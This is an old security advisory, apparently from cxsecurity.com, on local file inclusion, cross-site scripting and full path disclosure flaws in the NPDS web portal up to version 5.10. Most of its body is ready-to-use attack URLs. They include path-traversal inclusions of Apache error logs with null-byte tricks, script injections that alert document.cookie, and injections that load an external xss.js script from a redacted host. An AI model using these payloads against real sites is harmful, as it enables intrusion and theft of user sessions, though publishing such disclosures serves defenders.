NPDS <= 5.10 Local Inclusion, XSS, Full path disclosure

2006.06.13
Credit: gmdarkfig gmail com
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2006-2952 | CVE-2006-2951 | CVE-2006-2950
CWE: CWE-79

// Script Web -------- www.npds.org versions --- NPDS <= 5.10 Solutions -- None official Note ------- Vendor has been contacted // Local Inclusion http://[...]/header.php?Default_Theme=../apache/logs/error.log%00 http://[...]/modules/cluster-paradise/cluster-E.php?ModPath=../../../../ ../apache/logs/error.log%00 // Cross Site Scripting http://[...]/header.php?Titlesitename=</title><script>alert(document.coo kie)</script> http://[...]/header.php?sitename="><script>alert(document.cookie)</scrip t> http://[...]/meta/meta.php?nuke_url="><script>alert(document.cookie)</sc ript> http://[...]/viewforum.php?forum=2"><script src=http://[...]/xss.js> http://[...]/editpost.php?forum=1&post_id=888"><script src=http://[...]/xss.js> http://[...]/editpost.php?forum=1"><script src=http://[...]/xss.js> http://[...]/editpost.php?forum=1&topic="><script src=http://[...]/xss.js> http://[...]/editpost.php?forum=1&arbre="><script src=http://[...]/xss.js> http://[...]/user.php?op=only_newuser&uname="><script src=http://[...]/xss.js> http://[...]/user.php?op=only_newuser&email="><script src=http://[...]/xss.js> // Full Path Disclosure http://[...]/header.php http://[...]/modules/contact/contact.php http://[...]/modules/sform/forum/forum_extender.php // Credits by DarkFig -- http://www.acid-root.new.fr/advisories/npds510.txt


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top